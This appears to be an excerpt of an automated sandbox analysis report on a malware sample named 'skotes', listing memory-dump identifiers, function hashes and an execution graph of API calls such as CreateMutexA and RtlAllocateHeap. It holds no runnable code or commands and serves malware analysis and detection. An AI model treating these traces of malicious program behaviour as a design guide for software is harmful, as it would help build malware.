                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183973738.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183986076.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184002179.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184014073.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184027530.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184061928.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _strrchr
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3213747228-0
                                                                                                                                                                                                                                              • Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                                                                                              • Instruction ID: 498cdc525dfdfb83c2c889e327597b750da7a13a5514c4ff37e8d4622be60cdf
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3AB136329046559FEB15CF28C8C17EEBBE5EF55340F24426AE865EB2C2D6348E42CB60
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.2183253576.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183241564.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183253576.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183298522.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183323287.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183337101.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183349265.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183362592.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183448160.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183462698.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183480656.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183493828.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183506287.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183506287.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183532091.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183543836.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183557679.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183570847.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183588010.0000000000DF4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183601098.0000000000DF5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183613091.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183637557.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183655100.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183666981.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183679723.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183691415.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183704714.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183718528.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183731288.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183743704.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183757632.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183770268.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183791695.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183805801.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183818899.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183833396.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183846914.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183859103.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183873159.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183884988.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183884988.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183921886.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183940513.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183959130.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183973738.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183986076.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184002179.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184014073.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184027530.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184061928.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 531285432-0
                                                                                                                                                                                                                                              • Opcode ID: f8543847f07726ee3c49c09d30cecc01f351075ae0b7e82b83cf81ea777003c3
                                                                                                                                                                                                                                              • Instruction ID: 74f59ea1929a9731ec60f8544cf756a0ec4062a3451105935b79763ed191b336
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f8543847f07726ee3c49c09d30cecc01f351075ae0b7e82b83cf81ea777003c3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA2121759001599FDF00EFA5DC81DBFBBB9EF08710F100455F901A7251DB349D069B90

                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                              Execution Coverage:1.1%
                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                                                                              Total number of Nodes:1982
                                                                                                                                                                                                                                              Total number of Limit Nodes:11
                                                                                                                                                                                                                                              execution_graph 11759 bd9ab8 11761 bd9acc 11759->11761 11762 bd9b08 11761->11762 11763 bd9b4b shared_ptr 11762->11763 11767 bda917 11762->11767 11764 bd9b59 11763->11764 11765 bd9b65 11763->11765 11769 be80c0 RtlAllocateHeap 11764->11769 11766 be7a00 RtlAllocateHeap 11765->11766 11768 bd9b74 11766->11768 11770 bda953 Sleep CreateMutexA 11767->11770 11771 c06c6a RtlAllocateHeap 11767->11771 11772 bd5c10 4 API calls 11768->11772 11773 bda903 11769->11773 11775 bda98e 11770->11775 11771->11770 11774 bd9b7c 11772->11774 11788 bd8b30 11774->11788 11777 bd9b8d 11778 be8220 RtlAllocateHeap 11777->11778 11779 bd9b9c 11778->11779 11780 be7a00 RtlAllocateHeap 11779->11780 11781 bd9ca9 11780->11781 11782 bd5c10 4 API calls 11781->11782 11783 bd9cb1 11782->11783 11784 bd8b30 4 API calls 11783->11784 11785 bd9cc2 11784->11785 11786 be8220 RtlAllocateHeap 11785->11786 11787 bd9cd1 11786->11787 11789 bd8b7c 11788->11789 11790 be7a00 RtlAllocateHeap 11789->11790 11791 bd8b8c 11790->11791 11792 bd5c10 4 API calls 11791->11792 11793 bd8b97 11792->11793 11794 be80c0 RtlAllocateHeap 11793->11794 11795 bd8be3 11794->11795 11796 be80c0 RtlAllocateHeap 11795->11796 11797 bd8c35 11796->11797 11798 be8220 RtlAllocateHeap 11797->11798 11801 bd8c47 shared_ptr 11798->11801 11799 bd8d01 shared_ptr std::invalid_argument::invalid_argument 11799->11777 11800 c06c6a RtlAllocateHeap 11802 bd8d2d 11800->11802 11801->11799 11801->11800 11803 be7a00 RtlAllocateHeap 11802->11803 11804 bd8d8f 11803->11804 11805 bd5c10 4 API calls 11804->11805 11806 bd8d9a 11805->11806 11807 be80c0 RtlAllocateHeap 11806->11807 11808 bd8dec 11807->11808 11809 be8220 RtlAllocateHeap 11808->11809 11811 bd8dfe shared_ptr 11809->11811 11810 bd8e7e shared_ptr std::invalid_argument::invalid_argument 11810->11777 11811->11810 11812 c06c6a RtlAllocateHeap 11811->11812 11813 bd8eaa 11812->11813 11814 be7a00 RtlAllocateHeap 11813->11814 11815 bd8f0f 11814->11815 11816 bd5c10 4 API calls 11815->11816 11817 bd8f1a 11816->11817 11818 be80c0 RtlAllocateHeap 11817->11818 11819 bd8f6c 11818->11819 11820 be8220 RtlAllocateHeap 11819->11820 11821 bd8f7e shared_ptr 11820->11821 11822 bd8ffe shared_ptr std::invalid_argument::invalid_argument 11821->11822 11823 c06c6a RtlAllocateHeap 11821->11823 11822->11777 11824 bd902a 11823->11824 11825 bd42b0 11828 bd3ac0 11825->11828 11827 bd42bb shared_ptr 11829 bd3af9 11828->11829 11830 c06c6a RtlAllocateHeap 11829->11830 11835 bd3b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 11829->11835 11831 bd3be6 11830->11831 11832 bd32d0 6 API calls 11831->11832 11834 bd3c38 11831->11834 11832->11834 11833 bd32d0 6 API calls 11837 bd3c5f 11833->11837 11834->11833 11834->11837 11835->11827 11836 bd3c68 11836->11827 11837->11836 11838 bd3810 4 API calls 11837->11838 11839 bd3cdb 11838->11839 9957 bd5cad 9959 bd5caf shared_ptr 9957->9959 9958 bd5d17 shared_ptr std::invalid_argument::invalid_argument 9959->9958 9960 c06c6a RtlAllocateHeap 9959->9960 9961 bd5d47 __cftof 9960->9961 9961->9961 9962 be80c0 RtlAllocateHeap 9961->9962 9964 bd5e3e 9962->9964 9963 bd5ea6 shared_ptr std::invalid_argument::invalid_argument 9964->9963 9965 c06c6a RtlAllocateHeap 9964->9965 9966 bd5ed2 9965->9966 9967 bd5ffe shared_ptr std::invalid_argument::invalid_argument 9966->9967 9968 c06c6a RtlAllocateHeap 9966->9968 9969 bd601b 9968->9969 9970 be80c0 RtlAllocateHeap 9969->9970 9971 bd6089 9970->9971 9972 be80c0 RtlAllocateHeap 9971->9972 9973 bd60bd 9972->9973 9974 be80c0 RtlAllocateHeap 9973->9974 9975 bd60ee 9974->9975 9976 be80c0 RtlAllocateHeap 9975->9976 9977 bd611f 9976->9977 9978 be80c0 RtlAllocateHeap 9977->9978 9980 bd6150 9978->9980 9979 bd65b1 shared_ptr std::invalid_argument::invalid_argument 9980->9979 9981 c06c6a RtlAllocateHeap 9980->9981 9982 bd65dc 9981->9982 10005 be7a00 9982->10005 9984 bd66a6 10019 bd5c10 9984->10019 9986 bd66ac 9987 bd5c10 4 API calls 9986->9987 9988 bd66b1 9987->9988 10070 bd22c0 9988->10070 9990 bd66c9 shared_ptr 9991 be7a00 RtlAllocateHeap 9990->9991 9992 bd6732 9991->9992 9993 bd5c10 4 API calls 9992->9993 9994 bd673d 9993->9994 9995 bd22c0 4 API calls 9994->9995 10004 bd6757 shared_ptr 9995->10004 9996 bd6852 9997 be80c0 RtlAllocateHeap 9996->9997 9999 bd689c 9997->9999 9998 be7a00 RtlAllocateHeap 9998->10004 10000 be80c0 RtlAllocateHeap 9999->10000 10003 bd68e3 shared_ptr std::invalid_argument::invalid_argument 10000->10003 10001 bd5c10 4 API calls 10001->10004 10002 bd22c0 4 API calls 10002->10004 10004->9996 10004->9998 10004->10001 10004->10002 10006 be7a26 10005->10006 10007 be7a2d 10006->10007 10008 be7a62 10006->10008 10009 be7a81 10006->10009 10007->9984 10010 be7ab9 10008->10010 10011 be7a69 10008->10011 10014 bed3e2 RtlAllocateHeap 10009->10014 10016 be7a76 __cftof 10009->10016 10012 bd2480 RtlAllocateHeap 10010->10012 10013 bed3e2 RtlAllocateHeap 10011->10013 10015 be7a6f 10012->10015 10013->10015 10014->10016 10015->10016 10017 c06c6a RtlAllocateHeap 10015->10017 10016->9984 10018 be7ac3 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ __Cnd_unregister_at_thread_exit 10017->10018 10018->9984 10073 bd5940 10019->10073 10021 bd5c54 10076 bd4b30 10021->10076 10023 bd5c7b shared_ptr 10024 bd5d17 shared_ptr std::invalid_argument::invalid_argument 10023->10024 10025 c06c6a RtlAllocateHeap 10023->10025 10024->9986 10026 bd5d47 __cftof 10025->10026 10026->10026 10027 be80c0 RtlAllocateHeap 10026->10027 10029 bd5e3e 10027->10029 10028 bd5ea6 shared_ptr std::invalid_argument::invalid_argument 10028->9986 10029->10028 10030 c06c6a RtlAllocateHeap 10029->10030 10031 bd5ed2 10030->10031 10032 bd5ffe shared_ptr std::invalid_argument::invalid_argument 10031->10032 10033 c06c6a RtlAllocateHeap 10031->10033 10032->9986 10034 bd601b 10033->10034 10035 be80c0 RtlAllocateHeap 10034->10035 10036 bd6089 10035->10036 10037 be80c0 RtlAllocateHeap 10036->10037 10038 bd60bd 10037->10038 10039 be80c0 RtlAllocateHeap 10038->10039 10040 bd60ee 10039->10040 10041 be80c0 RtlAllocateHeap 10040->10041 10042 bd611f 10041->10042 10043 be80c0 RtlAllocateHeap 10042->10043 10045 bd6150 10043->10045 10044 bd65b1 shared_ptr std::invalid_argument::invalid_argument 10044->9986 10045->10044 10046 c06c6a RtlAllocateHeap 10045->10046 10047 bd65dc 10046->10047 10048 be7a00 RtlAllocateHeap 10047->10048 10049 bd66a6 10048->10049 10050 bd5c10 4 API calls 10049->10050 10051 bd66ac 10050->10051 10052 bd5c10 4 API calls 10051->10052 10053 bd66b1 10052->10053 10054 bd22c0 4 API calls 10053->10054 10055 bd66c9 shared_ptr 10054->10055 10056 be7a00 RtlAllocateHeap 10055->10056 10057 bd6732 10056->10057 10058 bd5c10 4 API calls 10057->10058 10059 bd673d 10058->10059 10060 bd22c0 4 API calls 10059->10060 10069 bd6757 shared_ptr 10060->10069 10061 bd6852 10062 be80c0 RtlAllocateHeap 10061->10062 10064 bd689c 10062->10064 10063 be7a00 RtlAllocateHeap 10063->10069 10065 be80c0 RtlAllocateHeap 10064->10065 10068 bd68e3 shared_ptr std::invalid_argument::invalid_argument 10065->10068 10066 bd5c10 4 API calls 10066->10069 10067 bd22c0 4 API calls 10067->10069 10068->9986 10069->10061 10069->10063 10069->10066 10069->10067 10291 bd2280 10070->10291 10083 be7f80 10073->10083 10075 bd596b 10075->10021 10077 bd4dc2 10076->10077 10081 bd4b92 10076->10081 10077->10023 10079 bd4ce5 10079->10077 10080 be8ca0 RtlAllocateHeap 10079->10080 10080->10079 10081->10079 10098 c06da6 10081->10098 10103 be8ca0 10081->10103 10084 be7fc7 10083->10084 10087 be7f9e __cftof 10083->10087 10085 be80b3 10084->10085 10090 be803e 10084->10090 10091 be801b 10084->10091 10086 be9270 RtlAllocateHeap 10085->10086 10088 be80b8 10086->10088 10087->10075 10089 bd2480 RtlAllocateHeap 10088->10089 10092 be80bd 10089->10092 10093 bed3e2 RtlAllocateHeap 10090->10093 10096 be802c __cftof 10090->10096 10091->10088 10094 bed3e2 RtlAllocateHeap 10091->10094 10093->10096 10094->10096 10095 c06c6a RtlAllocateHeap 10095->10085 10096->10095 10097 be8095 shared_ptr 10096->10097 10097->10075 10099 c06db4 10098->10099 10101 c06dc2 10098->10101 10118 c06d19 10099->10118 10101->10081 10104 be8dc9 10103->10104 10105 be8cc3 10103->10105 10106 be9270 RtlAllocateHeap 10104->10106 10109 be8d2f 10105->10109 10110 be8d05 10105->10110 10107 be8dce 10106->10107 10108 bd2480 RtlAllocateHeap 10107->10108 10116 be8d16 __cftof 10108->10116 10112 bed3e2 RtlAllocateHeap 10109->10112 10109->10116 10110->10107 10111 be8d10 10110->10111 10114 bed3e2 RtlAllocateHeap 10111->10114 10112->10116 10113 c06c6a RtlAllocateHeap 10115 be8dd8 10113->10115 10114->10116 10116->10113 10117 be8d8b shared_ptr __cftof 10116->10117 10117->10081 10123 c0690a 10118->10123 10122 c06d3d 10122->10081 10124 c06921 10123->10124 10125 c0692a 10123->10125 10131 c06d52 10124->10131 10125->10124 10137 c0a671 10125->10137 10132 c06d8f 10131->10132 10134 c06d5f 10131->10134 10275 c0b67d 10132->10275 10135 c06d6e 10134->10135 10270 c0b6a1 10134->10270 10135->10122 10138 c0a67b __dosmaperr 10137->10138 10139 c0d82f __dosmaperr RtlAllocateHeap 10138->10139 10140 c0a694 10138->10140 10142 c0a6bc __dosmaperr 10139->10142 10141 c0694a 10140->10141 10159 c08bec 10140->10159 10151 c0b5fb 10141->10151 10144 c0a6c4 __dosmaperr 10142->10144 10145 c0a6fc 10142->10145 10147 c0adf5 ___free_lconv_mon RtlAllocateHeap 10144->10147 10146 c0a49f __dosmaperr RtlAllocateHeap 10145->10146 10149 c0a707 10146->10149 10147->10140 10150 c0adf5 ___free_lconv_mon RtlAllocateHeap 10149->10150 10150->10140 10152 c06960 10151->10152 10153 c0b60e 10151->10153 10155 c0b628 10152->10155 10153->10152 10192 c0f5ab 10153->10192 10156 c0b650 10155->10156 10157 c0b63b 10155->10157 10156->10124 10157->10156 10205 c0e6b1 10157->10205 10160 c08bf1 __cftof 10159->10160 10164 c08bfc __cftof 10160->10164 10165 c0d634 10160->10165 10186 c065ed 10164->10186 10166 c0d640 __dosmaperr 10165->10166 10167 c0a7c8 __dosmaperr RtlAllocateHeap 10166->10167 10171 c0d667 __cftof 10166->10171 10173 c0d66d __cftof __dosmaperr 10166->10173 10167->10171 10168 c0d6b2 10169 c075f6 __dosmaperr RtlAllocateHeap 10168->10169 10170 c0d6b7 10169->10170 10172 c06c5a __cftof RtlAllocateHeap 10170->10172 10171->10168 10171->10173 10185 c0d69c 10171->10185 10172->10185 10174 c0d726 10173->10174 10175 c0d81b __cftof 10173->10175 10176 c0d751 __cftof 10173->10176 10174->10176 10189 c0d62b 10174->10189 10177 c065ed __cftof 3 API calls 10175->10177 10180 c0a671 __cftof 4 API calls 10176->10180 10183 c0d7a5 10176->10183 10176->10185 10179 c0d82e 10177->10179 10180->10183 10182 c0d62b __cftof 4 API calls 10182->10176 10184 c0a671 __cftof 4 API calls 10183->10184 10183->10185 10184->10185 10185->10164 10187 c064c7 __cftof 3 API calls 10186->10187 10188 c065fe 10187->10188 10190 c0a671 __cftof 4 API calls 10189->10190 10191 c0d630 10190->10191 10191->10182 10193 c0f5b7 __dosmaperr 10192->10193 10194 c0a671 __cftof 4 API calls 10193->10194 10196 c0f5c0 __dosmaperr 10194->10196 10195 c0f606 10195->10152 10196->10195 10201 c0f62c 10196->10201 10198 c0f5ef __cftof 10198->10195 10199 c08bec __cftof 4 API calls 10198->10199 10200 c0f62b 10199->10200 10202 c0f63a __cftof 10201->10202 10204 c0f647 10201->10204 10203 c0f35f __cftof RtlAllocateHeap 10202->10203 10202->10204 10203->10204 10204->10198 10206 c0a671 __cftof 4 API calls 10205->10206 10207 c0e6bb 10206->10207 10210 c0e5c9 10207->10210 10209 c0e6c1 10209->10156 10213 c0e5d5 __dosmaperr 10210->10213 10211 c0e5f6 10211->10209 10212 c08bec __cftof 4 API calls 10215 c0e668 10212->10215 10214 c0e5ef __cftof 10213->10214 10217 c0adf5 ___free_lconv_mon RtlAllocateHeap 10213->10217 10214->10211 10214->10212 10220 c0e6a4 10215->10220 10221 c0a72e 10215->10221 10217->10214 10220->10209 10222 c0a739 __dosmaperr 10221->10222 10223 c0d82f __dosmaperr RtlAllocateHeap 10222->10223 10234 c0a745 10222->10234 10226 c0a769 __dosmaperr 10223->10226 10224 c08bec __cftof 4 API calls 10225 c0a7c7 10224->10225 10228 c0a7a5 10226->10228 10229 c0a771 __dosmaperr 10226->10229 10227 c0a7be 10235 c0e4b0 10227->10235 10230 c0a49f __dosmaperr RtlAllocateHeap 10228->10230 10231 c0adf5 ___free_lconv_mon RtlAllocateHeap 10229->10231 10232 c0a7b0 10230->10232 10231->10234 10233 c0adf5 ___free_lconv_mon RtlAllocateHeap 10232->10233 10233->10234 10234->10224 10234->10227 10236 c0e5c9 __cftof 4 API calls 10235->10236 10237 c0e4c3 10236->10237 10254 c0e259 10237->10254 10240 c0e4dc 10240->10220 10244 c0e512 10246 c0e51a 10244->10246 10250 c0e535 __cftof 10244->10250 10245 c0adf5 ___free_lconv_mon RtlAllocateHeap 10247 c0e52d 10245->10247 10248 c075f6 __dosmaperr RtlAllocateHeap 10246->10248 10247->10220 10253 c0e51f 10248->10253 10249 c0e561 10249->10253 10266 c0e14b 10249->10266 10250->10249 10251 c0adf5 ___free_lconv_mon RtlAllocateHeap 10250->10251 10251->10249 10253->10245 10255 c0690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10254->10255 10256 c0e26b 10255->10256 10256->10240 10257 c0b04b 10256->10257 10259 c0b059 __dosmaperr 10257->10259 10258 c075f6 __dosmaperr RtlAllocateHeap 10260 c0b087 10258->10260 10259->10258 10259->10260 10260->10253 10261 c0e6c4 10260->10261 10262 c0e259 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10261->10262 10263 c0e6e4 __cftof 10262->10263 10264 c0e32f __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10263->10264 10265 c0e75a __cftof std::invalid_argument::invalid_argument 10263->10265 10264->10265 10265->10244 10267 c0e157 __dosmaperr 10266->10267 10268 c0e198 __cftof RtlAllocateHeap 10267->10268 10269 c0e16e __cftof 10268->10269 10269->10253 10271 c0690a __cftof 4 API calls 10270->10271 10272 c0b6be 10271->10272 10274 c0b6ce std::invalid_argument::invalid_argument 10272->10274 10280 c0f1bf 10272->10280 10274->10135 10276 c0a671 __cftof 4 API calls 10275->10276 10277 c0b688 10276->10277 10278 c0b5fb __cftof 4 API calls 10277->10278 10279 c0b698 10278->10279 10279->10135 10281 c0690a __cftof 4 API calls 10280->10281 10283 c0f1df __cftof 10281->10283 10282 c0f29d std::invalid_argument::invalid_argument 10282->10274 10283->10282 10284 c0b04b __cftof RtlAllocateHeap 10283->10284 10286 c0f232 __cftof 10283->10286 10284->10286 10287 c0f2c2 10286->10287 10288 c0f2df 10287->10288 10289 c0f2ce 10287->10289 10288->10282 10289->10288 10290 c0adf5 ___free_lconv_mon RtlAllocateHeap 10289->10290 10290->10288 10292 bd2296 10291->10292 10295 c087f8 10292->10295 10298 c07609 10295->10298 10297 bd22a4 10297->9990 10299 c07631 10298->10299 10300 c07649 10298->10300 10302 c075f6 __dosmaperr RtlAllocateHeap 10299->10302 10300->10299 10301 c07651 10300->10301 10303 c0690a __cftof 4 API calls 10301->10303 10304 c07636 10302->10304 10306 c07661 10303->10306 10305 c06c5a __cftof RtlAllocateHeap 10304->10305 10307 c07641 std::invalid_argument::invalid_argument 10305->10307 10311 c07bc4 10306->10311 10307->10297 10327 c0868d 10311->10327 10313 c076e8 10324 c07a19 10313->10324 10314 c07be4 10315 c075f6 __dosmaperr RtlAllocateHeap 10314->10315 10316 c07be9 10315->10316 10317 c06c5a __cftof RtlAllocateHeap 10316->10317 10317->10313 10318 c07bd5 10318->10313 10318->10314 10334 c07d15 10318->10334 10342 c08168 10318->10342 10347 c07dc2 10318->10347 10352 c07de8 10318->10352 10381 c07f36 10318->10381 10325 c0adf5 ___free_lconv_mon RtlAllocateHeap 10324->10325 10326 c07a29 10325->10326 10326->10307 10328 c08692 10327->10328 10329 c086a5 10327->10329 10330 c075f6 __dosmaperr RtlAllocateHeap 10328->10330 10329->10318 10331 c08697 10330->10331 10332 c06c5a __cftof RtlAllocateHeap 10331->10332 10333 c086a2 10332->10333 10333->10318 10403 c07d34 10334->10403 10336 c07d1a 10337 c07d31 10336->10337 10338 c075f6 __dosmaperr RtlAllocateHeap 10336->10338 10337->10318 10339 c07d23 10338->10339 10340 c06c5a __cftof RtlAllocateHeap 10339->10340 10341 c07d2e 10340->10341 10341->10318 10343 c08171 10342->10343 10344 c08178 10342->10344 10412 c07b50 10343->10412 10344->10318 10348 c07dcb 10347->10348 10350 c07dd2 10347->10350 10349 c07b50 4 API calls 10348->10349 10351 c07dd1 10349->10351 10350->10318 10351->10318 10353 c07e09 10352->10353 10354 c07def 10352->10354 10357 c075f6 __dosmaperr RtlAllocateHeap 10353->10357 10377 c07e39 10353->10377 10355 c07fbb 10354->10355 10356 c07f4f 10354->10356 10354->10377 10360 c08001 10355->10360 10361 c07fc2 10355->10361 10371 c07f92 10355->10371 10367 c07f5b 10356->10367 10356->10371 10358 c07e25 10357->10358 10359 c06c5a __cftof RtlAllocateHeap 10358->10359 10362 c07e30 10359->10362 10477 c08604 10360->10477 10365 c07fc7 10361->10365 10366 c07f69 10361->10366 10362->10318 10364 c07f77 10372 c07f8b 10364->10372 10480 c086ea 10364->10480 10365->10371 10373 c07fcc 10365->10373 10366->10364 10366->10372 10471 c08241 10366->10471 10367->10364 10367->10366 10370 c07fa2 10367->10370 10370->10372 10448 c08390 10370->10448 10371->10364 10371->10372 10462 c08420 10371->10462 10372->10318 10374 c07fd1 10373->10374 10375 c07fdf 10373->10375 10374->10372 10452 c085e5 10374->10452 10456 c08571 10375->10456 10377->10318 10382 c07fbb 10381->10382 10383 c07f4f 10381->10383 10384 c08001 10382->10384 10385 c07fc2 10382->10385 10389 c07f92 10382->10389 10383->10389 10390 c07f5b 10383->10390 10386 c08604 RtlAllocateHeap 10384->10386 10387 c07fc7 10385->10387 10398 c07f69 10385->10398 10400 c07f77 10386->10400 10387->10389 10393 c07fcc 10387->10393 10388 c07fa2 10397 c08390 4 API calls 10388->10397 10402 c07f8b 10388->10402 10391 c08420 RtlAllocateHeap 10389->10391 10389->10400 10389->10402 10390->10388 10390->10398 10390->10400 10391->10400 10392 c08241 4 API calls 10392->10400 10394 c07fd1 10393->10394 10395 c07fdf 10393->10395 10399 c085e5 RtlAllocateHeap 10394->10399 10394->10402 10396 c08571 RtlAllocateHeap 10395->10396 10396->10400 10397->10400 10398->10392 10398->10400 10398->10402 10399->10400 10401 c086ea 4 API calls 10400->10401 10400->10402 10401->10402 10402->10318 10406 c07d5e 10403->10406 10405 c07d40 10405->10336 10407 c07d80 10406->10407 10408 c07db7 10407->10408 10409 c075f6 __dosmaperr 